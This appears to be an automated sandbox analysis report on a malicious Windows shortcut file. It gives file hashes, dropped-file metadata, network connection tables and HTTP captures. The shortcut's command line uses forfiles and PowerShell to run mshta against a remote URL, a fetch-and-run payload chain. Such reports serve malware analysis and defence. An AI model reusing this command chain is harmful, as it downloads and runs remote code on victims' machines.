SHA-512:	79C32C86BEFDD135B66DC959AC41CB83823D94BD70134542605461A658C313781A569C6FC856D4E62CA3BA6FFA23DA761DBFA6E95FA4AADDEDA5E2CC8F709A31
Malicious:	false
Reputation:	low
Preview:	..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

Process:	C:\Windows\System32\mshta.exe
File Type:	data
Category:	dropped
Size (bytes):	49120
Entropy (8bit):	0.0017331682157558962
Encrypted:	false
SSDEEP:	3:Ztt:T
MD5:	0392ADA071EB68355BED625D8F9695F3
SHA1:	777253141235B6C6AC92E17E297A1482E82252CC
SHA-256:	B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
SHA-512:	EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.773832331134527
Encrypted:	false
SSDEEP:	3:Nlllul:NllU
MD5:	16CD248E7DE27479D8EA6DC76E4D1E05
SHA1:	2598E92B97E6F812DE30A2099546BFC3CE418383
SHA-256:	4DCCC50A6CC980CA3CAB2FECCBA6A11C8B523E6E1C0096E4EB6754B7DA417254
SHA-512:	F7E19DA3C0194863470860B49073F6FAC8F5D3BC801F3EBC230BBFD05E16FF9A950F68FF14CF55C59C491B008C9666600D3817E1220100BFD669482AF9235B50
Malicious:	false
Preview:	@...e.................................X.........................

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=115, Archive, ctime=Sat May 8 07:13:59 2021, mtime=Sat May 8 07:13:59 2021, atime=Sat May 8 07:13:59 2021, length=41472, window=hidenormalshowminimized
Entropy (8bit):	4.490108262249386
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	8t6beMY1wO.lnk
File size:	1'134 bytes
MD5:	50e161c24d2f447015cae82cccaf4885
SHA1:	f4f7fa40c75d74e22df41b1916893b514c54e384
SHA256:	4a37a2af26ce9de3b828c5a92320bbefa6e91b6f1a4ad67c4f701729c0ff92eb
SHA512:	61d09e29ae77852fa70a9e9cc9a8e693e9356f9ec9e1ca9854358fdef92a9fd2bb02317b444934ee27950cf44133846b489764a7f16f49ca4233e8e3d2620c65
SSDEEP:	24:8faXMmPd4vd4pyA62Pkw+/4t+0F6xZAaP1y/1lYdsW2mt:8facm1Udu6oZ+AbLGsW2U
TLSH:	C521102513DF1F30D2F38B396CB66B13BA39BC05FA23AF2E414065540821612B8B4F3A
File Content Preview:	L..................F.... ...p.V..C..p.V..C..p.V..C......s...................E....P.O. .:i.....+00.../C:\...................V.1......X.)..Windows.@........R.@.X.)..........................aTF.W.i.n.d.o.w.s.....Z.1......X.:..System32..B........R.@.X.:......

General
Relative Path:	..\..\..\Windows\System32\forfiles.exe
Command Line Argument:	/p C:\Windows /m win.ini /c "powershell . mshta https://vidstreemz.b-cdn.net/nexto"
Icon location:	shell32.dll

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 17, 2024 09:23:08.834850073 CEST	49704	443	192.168.2.8	138.199.36.7
Sep 17, 2024 09:23:08.834882975 CEST	443	49704	138.199.36.7	192.168.2.8
Sep 17, 2024 09:23:08.834970951 CEST	49704	443	192.168.2.8	138.199.36.7
Sep 17, 2024 09:23:08.864068985 CEST	49704	443	192.168.2.8	138.199.36.7
Sep 17, 2024 09:23:08.864089966 CEST	443	49704	138.199.36.7	192.168.2.8
Sep 17, 2024 09:23:09.985745907 CEST	443	49704	138.199.36.7	192.168.2.8
Sep 17, 2024 09:23:09.985893011 CEST	49704	443	192.168.2.8	138.199.36.7
Sep 17, 2024 09:23:10.038057089 CEST	49704	443	192.168.2.8	138.199.36.7
Sep 17, 2024 09:23:10.038074017 CEST	443	49704	138.199.36.7	192.168.2.8
Sep 17, 2024 09:23:10.038438082 CEST	443	49704	138.199.36.7	192.168.2.8
Sep 17, 2024 09:23:10.038507938 CEST	49704	443	192.168.2.8	138.199.36.7
Sep 17, 2024 09:23:10.040709972 CEST	49704	443	192.168.2.8	138.199.36.7
Sep 17, 2024 09:23:10.083445072 CEST	443	49704	138.199.36.7	192.168.2.8
Sep 17, 2024 09:23:10.262312889 CEST	443	49704	138.199.36.7	192.168.2.8
Sep 17, 2024 09:23:10.262389898 CEST	443	49704	138.199.36.7	192.168.2.8
Sep 17, 2024 09:23:10.262403965 CEST	49704	443	192.168.2.8	138.199.36.7
Sep 17, 2024 09:23:10.262435913 CEST	49704	443	192.168.2.8	138.199.36.7
Sep 17, 2024 09:23:10.265062094 CEST	49704	443	192.168.2.8	138.199.36.7
Sep 17, 2024 09:23:10.265083075 CEST	443	49704	138.199.36.7	192.168.2.8
Sep 17, 2024 09:23:10.280630112 CEST	49705	80	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:10.282802105 CEST	49706	443	192.168.2.8	169.150.247.37
Sep 17, 2024 09:23:10.282851934 CEST	443	49706	169.150.247.37	192.168.2.8
Sep 17, 2024 09:23:10.282954931 CEST	49706	443	192.168.2.8	169.150.247.37
Sep 17, 2024 09:23:10.283127069 CEST	49706	443	192.168.2.8	169.150.247.37
Sep 17, 2024 09:23:10.283144951 CEST	443	49706	169.150.247.37	192.168.2.8
Sep 17, 2024 09:23:10.285486937 CEST	80	49705	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:10.285546064 CEST	49705	80	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:10.285645962 CEST	49705	80	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:10.290416956 CEST	80	49705	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:10.396065950 CEST	49707	443	192.168.2.8	169.150.247.39
Sep 17, 2024 09:23:10.396087885 CEST	443	49707	169.150.247.39	192.168.2.8
Sep 17, 2024 09:23:10.396238089 CEST	49707	443	192.168.2.8	169.150.247.39
Sep 17, 2024 09:23:10.396545887 CEST	49707	443	192.168.2.8	169.150.247.39
Sep 17, 2024 09:23:10.396560907 CEST	443	49707	169.150.247.39	192.168.2.8
Sep 17, 2024 09:23:10.796505928 CEST	80	49705	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:10.796649933 CEST	49705	80	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:10.856457949 CEST	49708	443	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:10.856491089 CEST	443	49708	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:10.856564045 CEST	49708	443	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:10.858674049 CEST	49708	443	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:10.858689070 CEST	443	49708	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:11.335139036 CEST	443	49706	169.150.247.37	192.168.2.8
Sep 17, 2024 09:23:11.335203886 CEST	49706	443	192.168.2.8	169.150.247.37
Sep 17, 2024 09:23:11.339109898 CEST	49706	443	192.168.2.8	169.150.247.37
Sep 17, 2024 09:23:11.339121103 CEST	443	49706	169.150.247.37	192.168.2.8
Sep 17, 2024 09:23:11.339376926 CEST	443	49706	169.150.247.37	192.168.2.8
Sep 17, 2024 09:23:11.339420080 CEST	49706	443	192.168.2.8	169.150.247.37
Sep 17, 2024 09:23:11.341738939 CEST	443	49707	169.150.247.39	192.168.2.8
Sep 17, 2024 09:23:11.341793060 CEST	49707	443	192.168.2.8	169.150.247.39
Sep 17, 2024 09:23:11.344124079 CEST	49706	443	192.168.2.8	169.150.247.37
Sep 17, 2024 09:23:11.349436998 CEST	49707	443	192.168.2.8	169.150.247.39
Sep 17, 2024 09:23:11.349451065 CEST	443	49707	169.150.247.39	192.168.2.8
Sep 17, 2024 09:23:11.349708080 CEST	443	49707	169.150.247.39	192.168.2.8
Sep 17, 2024 09:23:11.349756002 CEST	49707	443	192.168.2.8	169.150.247.39
Sep 17, 2024 09:23:11.350044012 CEST	49707	443	192.168.2.8	169.150.247.39
Sep 17, 2024 09:23:11.391407967 CEST	443	49707	169.150.247.39	192.168.2.8
Sep 17, 2024 09:23:11.391413927 CEST	443	49706	169.150.247.37	192.168.2.8
Sep 17, 2024 09:23:11.475804090 CEST	443	49708	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:11.475917101 CEST	49708	443	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:11.479204893 CEST	49708	443	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:11.479212046 CEST	443	49708	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:11.479475975 CEST	443	49708	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:11.479527950 CEST	49708	443	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:11.479832888 CEST	49708	443	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:11.523402929 CEST	443	49708	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:11.608494997 CEST	443	49708	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:11.608593941 CEST	49708	443	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:11.608606100 CEST	443	49708	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:11.608649969 CEST	49708	443	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:11.614171028 CEST	443	49708	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:11.614178896 CEST	443	49708	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:11.614207029 CEST	443	49708	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:11.614237070 CEST	443	49708	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:11.614269972 CEST	49708	443	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:11.614331007 CEST	49708	443	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:11.618753910 CEST	443	49706	169.150.247.37	192.168.2.8
Sep 17, 2024 09:23:11.618819952 CEST	49706	443	192.168.2.8	169.150.247.37
Sep 17, 2024 09:23:11.618844032 CEST	443	49706	169.150.247.37	192.168.2.8
Sep 17, 2024 09:23:11.618870974 CEST	443	49706	169.150.247.37	192.168.2.8
Sep 17, 2024 09:23:11.618887901 CEST	49706	443	192.168.2.8	169.150.247.37
Sep 17, 2024 09:23:11.618912935 CEST	49706	443	192.168.2.8	169.150.247.37
Sep 17, 2024 09:23:11.620835066 CEST	49708	443	192.168.2.8	169.150.236.104
Sep 17, 2024 09:23:11.620852947 CEST	443	49708	169.150.236.104	192.168.2.8
Sep 17, 2024 09:23:11.624769926 CEST	49706	443	192.168.2.8	169.150.247.37
Sep 17, 2024 09:23:11.624785900 CEST	443	49706	169.150.247.37	192.168.2.8
Sep 17, 2024 09:23:11.791177988 CEST	49709	443	192.168.2.8	169.150.247.36
Sep 17, 2024 09:23:11.791213989 CEST	443	49709	169.150.247.36	192.168.2.8
Sep 17, 2024 09:23:11.791286945 CEST	49709	443	192.168.2.8	169.150.247.36
Sep 17, 2024 09:23:11.791563034 CEST	49709	443	192.168.2.8	169.150.247.36
Sep 17, 2024 09:23:11.791578054 CEST	443	49709	169.150.247.36	192.168.2.8
Sep 17, 2024 09:23:12.543171883 CEST	443	49709	169.150.247.36	192.168.2.8
Sep 17, 2024 09:23:12.543246031 CEST	49709	443	192.168.2.8	169.150.247.36
Sep 17, 2024 09:23:12.546761990 CEST	49709	443	192.168.2.8	169.150.247.36
Sep 17, 2024 09:23:12.546773911 CEST	443	49709	169.150.247.36	192.168.2.8
Sep 17, 2024 09:23:12.547059059 CEST	443	49709	169.150.247.36	192.168.2.8
Sep 17, 2024 09:23:12.547102928 CEST	49709	443	192.168.2.8	169.150.247.36
Sep 17, 2024 09:23:12.547437906 CEST	49709	443	192.168.2.8	169.150.247.36
Sep 17, 2024 09:23:12.595407009 CEST	443	49709	169.150.247.36	192.168.2.8
Sep 17, 2024 09:23:12.825297117 CEST	443	49709	169.150.247.36	192.168.2.8
Sep 17, 2024 09:23:12.825318098 CEST	443	49709	169.150.247.36	192.168.2.8
Sep 17, 2024 09:23:12.825408936 CEST	49709	443	192.168.2.8	169.150.247.36
Sep 17, 2024 09:23:12.825429916 CEST	443	49709	169.150.247.36	192.168.2.8
Sep 17, 2024 09:23:12.825479984 CEST	49709	443	192.168.2.8	169.150.247.36
Sep 17, 2024 09:23:12.825479984 CEST	49709	443	192.168.2.8	169.150.247.36
Sep 17, 2024 09:23:12.826910973 CEST	49709	443	192.168.2.8	169.150.247.36
Sep 17, 2024 09:23:12.826948881 CEST	443	49709	169.150.247.36	192.168.2.8
Sep 17, 2024 09:23:12.827009916 CEST	49709	443	192.168.2.8	169.150.247.36
Sep 17, 2024 09:23:27.218938112 CEST	443	49707	169.150.247.39	192.168.2.8
Sep 17, 2024 09:23:27.218961954 CEST	443	49707	169.150.247.39	192.168.2.8
Sep 17, 2024 09:23:27.219023943 CEST	49707	443	192.168.2.8	169.150.247.39
Sep 17, 2024 09:23:27.219034910 CEST	443	49707	169.150.247.39	192.168.2.8
Sep 17, 2024 09:23:27.219063044 CEST	443	49707	169.150.247.39	192.168.2.8
Sep 17, 2024 09:23:27.219077110 CEST	49707	443	192.168.2.8	169.150.247.39
Sep 17, 2024 09:23:27.219106913 CEST	49707	443	192.168.2.8	169.150.247.39
Sep 17, 2024 09:23:27.219528913 CEST	49707	443	192.168.2.8	169.150.247.39
Sep 17, 2024 09:23:27.219552994 CEST	443	49707	169.150.247.39	192.168.2.8
Sep 17, 2024 09:24:58.781699896 CEST	49705	80	192.168.2.8	169.150.236.104
Sep 17, 2024 09:24:58.983081102 CEST	80	49705	169.150.236.104	192.168.2.8
Sep 17, 2024 09:24:58.983164072 CEST	49705	80	192.168.2.8	169.150.236.104

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 17, 2024 09:23:08.817828894 CEST	49288	53	192.168.2.8	1.1.1.1
Sep 17, 2024 09:23:08.826729059 CEST	53	49288	1.1.1.1	192.168.2.8
Sep 17, 2024 09:23:10.271748066 CEST	62847	53	192.168.2.8	1.1.1.1
Sep 17, 2024 09:23:10.273178101 CEST	55505	53	192.168.2.8	1.1.1.1
Sep 17, 2024 09:23:10.276331902 CEST	49983	53	192.168.2.8	1.1.1.1
Sep 17, 2024 09:23:10.279954910 CEST	53	62847	1.1.1.1	192.168.2.8
Sep 17, 2024 09:23:10.282254934 CEST	53	55505	1.1.1.1	192.168.2.8
Sep 17, 2024 09:23:10.393631935 CEST	53	49983	1.1.1.1	192.168.2.8
Sep 17, 2024 09:23:11.780946970 CEST	55328	53	192.168.2.8	1.1.1.1
Sep 17, 2024 09:23:11.790523052 CEST	53	55328	1.1.1.1	192.168.2.8

Timestamp	Bytes transferred	Direction	Data
Sep 17, 2024 09:23:10.285645962 CEST	355	OUT	GET /css?family=Rubik:300,400,500,700,900 HTTP/1.1 Accept: / Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: fonts.bunny.net Connection: Keep-Alive
Sep 17, 2024 09:23:10.796505928 CEST	875	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 17 Sep 2024 07:23:10 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Server: BunnyCDN-IL1-1206 CDN-PullZone: 781720 CDN-Uid: 3a60ca70-b89d-4cd5-a4b5-34a3468d7e0f CDN-RequestCountryCode: US Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match Access-Control-Expose-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match Location: https://fonts.bunny.net/css?family=Rubik:300,400,500,700,900 CDN-RequestId: e0f89f7fe74c73d46502f060c8ddc07b Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Timestamp	Bytes transferred	Direction	Data
2024-09-17 07:23:10 UTC	329	OUT	GET /nexto HTTP/1.1 Accept: / Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: vidstreemz.b-cdn.net Connection: Keep-Alive
2024-09-17 07:23:10 UTC	234	IN	HTTP/1.1 403 Forbidden Date: Tue, 17 Sep 2024 07:23:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Server: BunnyCDN-DE1-1047 CDN-RequestId: dadb726982688969a757bb31ab82be38
2024-09-17 07:23:10 UTC	725	IN	Data Raw: 32 63 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 62 75 6e 6e 79 2e 6e 65 74 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 75 62 69 6b 3a 33 30 30 2c 34 30 30 2c 35 30 30 2c 37 30 30 2c 39 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 75 6e 6e 79 63 64 6e 2e 62 2d 63 64 6e 2e 6e 65 74 2f 61 73 73 65 74 73 2f 6c 61 6e 64 69 6e 67 70 61 67 65 2f 63 73 73 2f 75 6e 63 6f 6e 66 69 67 75 72 65 64 2e 63 73 73 22 3e 20 3c 74 69 74 6c 65 3e 42 75 6e 6e 79 43 44 4e 20 4e 6f 64 65 20 44 45 31 2d 31 30 34 37 3c 2f 74 Data Ascii: 2c9<html><head> <link href="http://fonts.bunny.net/css?family=Rubik:300,400,500,700,900" rel="stylesheet" type="text/css"> <link rel="stylesheet" href="https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css"> <title>BunnyCDN Node DE1-1047</t

Timestamp	Bytes transferred	Direction	Data
2024-09-17 07:23:11 UTC	406	OUT	GET /assets/landingpage/css/unconfigured.css HTTP/1.1 Accept: / Referer: https://vidstreemz.b-cdn.net/nexto Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: bunnycdn.b-cdn.net Connection: Keep-Alive
2024-09-17 07:23:11 UTC	956	IN	HTTP/1.1 200 OK Date: Tue, 17 Sep 2024 07:23:11 GMT Content-Type: text/css Content-Length: 1199 Connection: close Vary: Accept-Encoding Server: BunnyCDN-DE1-1080 CDN-PullZone: 390 CDN-Uid: 51eb4203-ff94-48c6-99a5-954f277b91de CDN-RequestCountryCode: US Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match Access-Control-Expose-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match Cache-Control: public, max-age=2592000 ETag: "01cf3d6e3f9da1:0" Last-Modified: Thu, 29 Aug 2024 07:19:52 GMT Backend: 1 CDN-ProxyVer: 1.04 CDN-RequestPullSuccess: True CDN-RequestPullCode: 200 CDN-CachedAt: 08/30/2024 05:07:32 CDN-EdgeStorageId: 1082 CDN-Status: 200 CDN-RequestId: cf5e749ec5bdecca714b7117586f6853 CDN-Cache: HIT Accept-Ranges: bytes
2024-09-17 07:23:11 UTC	1199	IN	Data Raw: ef bb bf 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 75 62 69 6b 27 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 62 75 6e 6e 79 63 64 6e 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 32 2f 69 6d 61 67 65 73 2f 67 65 6e 65 72 61 6c 2f 69 6c 2d 62 67 2d 62 6c 61 63 6b 2d 66 6c 6f 77 65 72 2e 73 76 67 29 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0d 0a 20 20 Data Ascii: html, body { width: 100%; margin: 0; padding: 0; text-align: center; font-family: 'Rubik'; background-image: url(https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg); background-repeat: no-repeat;